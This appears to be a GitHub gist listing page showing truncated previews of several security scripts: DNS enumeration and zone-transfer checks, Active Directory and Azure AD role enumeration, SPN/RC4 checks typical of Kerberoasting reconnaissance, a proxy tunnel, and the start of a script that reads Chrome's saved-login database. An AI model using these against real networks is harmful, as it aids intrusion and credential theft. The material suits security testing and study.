Josh Finley joshfinley

joshfinley / recursive-dns-enum.py
Created February 22, 2024 20:59
Take a list of domain names and try dnsenum against them all
import subprocess
import sys
def run_dnsenum(wordlist, dns_server, domain_file):
with open(domain_file, 'r') as file:
domains = file.readlines()
for domain in domains:
domain = domain.strip()
command = [
joshfinley / recursive-zone-transfer.py
Last active February 22, 2024 20:24
Check for zone transfers in a domain and all its subdomains
import dns.query
import dns.zone
import sys
def axfr_query(domain, nameserver):
    """Attempt a full zone transfer (AXFR) of *domain* from *nameserver*.

    Returns the zone object built by ``dns.zone.from_xfr`` when the transfer
    succeeds, or ``None`` when any exception is raised along the way.

    A non-``None`` result means the server handed the whole zone to this
    client. On a server you operate, that is a finding to remediate by
    limiting transfers to the authorised secondaries (address ACL and/or
    TSIG keys).
    """
    # NOTE(review): no timeout/lifetime is passed to dns.query.xfr, so an
    # unresponsive server may stall the caller -- confirm against the
    # dnspython version in use.
    try:
        transfer = dns.query.xfr(nameserver, domain)
        parsed_zone = dns.zone.from_xfr(transfer)
    except Exception:
        # Every failure (refusal, network error, malformed reply, even a
        # programming error) collapses to None, so callers cannot tell
        # "transfer refused" apart from "the check did not run".
        return None
    return parsed_zone
param(
[string]$filePath
)
Import-Module ActiveDirectory
Get-Content $filePath | ForEach-Object {
$groupName = $_
Write-Host "`nGroup-Name $groupName"
Write-Host "----------------"
# Import the Active Directory module
Import-Module ActiveDirectory
# Group name to search for
$groupName = "YourGroupName"
# Get the group
$group = Get-ADGroup -Filter { Name -eq $groupName }
if ($group -ne $null) {
import paramiko
import socket
import select
def http_connect_tunnel(proxy_host, proxy_port, target_host, target_port):
"""
Establish an HTTP CONNECT tunnel through a proxy.
"""
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((proxy_host, proxy_port))
# Import the Active Directory module
Import-Module ActiveDirectory
# Search for all AD objects with SPNs
$objectsWithSPN = Get-ADObject -Filter 'ServicePrincipalName -like "*"' -Properties ServicePrincipalName, msDS-SupportedEncryptionTypes
# Iterate through each object and check for RC4 encryption
foreach ($obj in $objectsWithSPN) {
$name = $obj.Name
$spns = $obj.ServicePrincipalName
# Import the Active Directory module
Import-Module ActiveDirectory
# Enumerate all user accounts with SPNs
$usersWithSPN = Get-ADUser -Filter {ServicePrincipalName -ne "$null"} -Properties ServicePrincipalName, msDS-SupportedEncryptionTypes
# Iterate through each user and check for RC4 encryption
foreach ($user in $usersWithSPN) {
$userName = $user.SamAccountName
$spns = $user.ServicePrincipalName
import sqlite3
import shutil
import os
import win32crypt
from importlib import import_module
def get_chrome_db_path():
"""Determine the path of the Chrome history database based on the operating system."""
if os.name == "nt": # Windows
return f"C:\\Users\\{os.getlogin()}\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data".format(os.getlogin())
# Import the required module if not already imported
Import-Module AzureAD
# Login to Azure AD
Connect-AzureAD
# Get the 'Application Admin' role
$appAdminRole = Get-AzureADDirectoryRole | Where-Object {$_.displayName -eq 'Application Admin'}
# If the role hasn't been instantiated, instantiate it
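# Install the AzureAD PowerShell module
Install-Module AzureAD

# Authenticate to the tenant
# NOTE(review): the account name and password below are placeholder literals
# held in plaintext. Real values stored this way are readable by anyone with
# access to the script file or the repository it is committed to; prefer
# Get-Credential or a secret store and keep credentials out of the script.
$username = "username@domain.com"
$password = 'YourVeryStrongPassword'
# -AsPlainText -Force is required because the source value is an ordinary string.
$SecurePassword = ConvertTo-SecureString "$password" -AsPlainText -Force
$Credential = New-Object System.Management.Automation.PSCredential($username, $SecurePassword)
Connect-AzureAD -Credential $Credential

# Build our users and roles object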
$UserRoles = Get-AzureADDirectoryRole | ForEach-Object {
$Role = $_